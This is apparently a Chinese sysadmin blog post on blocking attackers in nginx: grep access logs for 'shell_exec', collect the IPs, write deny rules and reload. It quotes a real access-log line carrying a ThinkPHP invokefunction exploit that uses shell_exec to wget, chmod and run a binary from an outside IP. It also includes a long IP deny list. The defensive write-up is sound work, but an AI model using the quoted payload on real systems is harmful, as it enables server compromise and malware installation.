找到具有明显特征的访问记录,比如:
156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"
也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。
匹配特征找出不重复的 IP,写入文件:
$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips
编辑一个 nginx 配置,加入到 location 访问中:
$ cat blockips > /etc/nginx/conf.d/blockips.conf
location / {
include /etc/nginx/conf.d/blockips.conf
xxxx;
}
编辑 blockips.conf,行首加 "deny ",行尾加 ";"
%s/^/deny /g
%s/$/\;/g
重载 nginx:
# 宿主机模式 $ nginx -s reload # Docker模式 $ docker-compose up -d --force-recreate nginx
附一份恶意访问IP:
deny 156.195.107.210; deny 156.195.39.140; deny 156.195.45.250; deny 156.196.146.114; deny 156.196.17.47; deny 156.196.6.26; deny 156.198.62.131; deny 156.200.245.40; deny 156.201.18.181; deny 156.202.190.62; deny 156.202.251.75; deny 156.202.76.2; deny 156.202.84.179; deny 156.203.12.198; deny 156.203.244.51; deny 156.205.251.198; deny 156.205.81.35; deny 156.206.136.3; deny 156.206.187.73; deny 156.207.242.8; deny 156.209.137.91; deny 156.212.251.36; deny 156.214.142.160; deny 156.214.43.68; deny 156.218.133.186; deny 156.218.246.73; deny 156.219.214.185; deny 156.222.20.232; deny 157.230.121.160; deny 167.172.104.251; deny 192.64.86.141; deny 197.33.38.103; deny 197.35.49.18; deny 197.36.233.108; deny 197.36.33.241; deny 197.41.192.255; deny 197.41.76.25; deny 197.46.143.130; deny 197.53.154.219; deny 197.61.10.30; deny 197.62.106.69; deny 41.236.148.6; deny 41.236.3.171; deny 41.238.34.214; deny 41.35.143.95; deny 41.36.196.47; deny 41.36.20.93; deny 41.36.221.70; deny 41.42.59.4; deny 41.45.98.34; deny 41.47.75.136; deny 80.10.22.62; deny 95.14.156.128;